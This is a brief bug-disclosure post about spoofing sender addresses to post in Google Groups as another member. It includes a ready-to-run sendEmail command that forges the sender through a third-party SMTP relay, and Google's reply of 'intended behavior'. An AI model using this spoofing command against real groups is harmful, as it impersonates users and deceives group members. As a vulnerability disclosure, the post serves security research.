Google Bug: Posting on groups as any user’s behalf

Google Groups is a service from Google that provides discussion groups for people sharing common interests.Today I will be sharing one of my finding in Google group.Using this issue an attacker could’ve post on any user’s behalf.

Note:

“Google Mail is vulnerable to e-mail spoofing so this made the attack easy”

Steps to reproduce
1. Search group where we want to post a new topic.
2. spoof e-mail using below command I used smtp2go server.

sendEmail -f groupmember@gmail.com -t victim@googlegroups.com -u new topic -m mail -s mail.smtp2go.com:2525

f — victim email id
t — google group email
s — smtp server and port
I have already set IP authentication in smtp server which we don’t need authenticate using username and password

Refresh the group page and a post is made on victim’s behalf :”)

Timeline:

Reported: Aug 14,2017,6:24 PM

Google response: intended behavior!